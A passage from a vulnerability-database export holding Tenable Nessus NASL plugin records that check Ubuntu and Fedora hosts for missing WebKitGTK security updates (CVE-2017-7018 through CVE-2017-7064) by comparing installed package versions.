Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3376-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.16.6-0ubuntu0.17.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:11:35", "description": "This update addresses the following vulnerabilities :\n\n -\n 
[CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-31T00:00:00", "title": "Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2017-07-31T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:webkitgtk4"], "id": "FEDORA_2017-73D6A0DFBB.NASL", "href": 
"https://www.tenable.com/plugins/nessus/102047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-73d6a0dfbb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102047);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n\n script_name(english:\"Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n 
i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-73d6a0dfbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"webkitgtk4-2.16.6-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:12:28", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n 
[CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-11T00:00:00", "title": "Fedora 24 : webkitgtk4 (2017-9d572cc64a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2017-08-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-9D572CC64A.NASL", "href": "https://www.tenable.com/plugins/nessus/102398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-9d572cc64a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102398);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n\n script_name(english:\"Fedora 24 : webkitgtk4 (2017-9d572cc64a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland 
target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9d572cc64a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"webkitgtk4-2.16.6-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:15:30", "description": "This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n 
i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-28T00:00:00", "title": "Fedora 26 : webkitgtk4 (2017-24bddb96b5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2017-07-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-24BDDB96B5.NASL", "href": "https://www.tenable.com/plugins/nessus/102023", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-24bddb96b5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102023);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2017-24bddb96b5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland 
target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-24bddb96b5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.16.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T03:32:52", "description": "The version of Apple iTunes installed on the remote 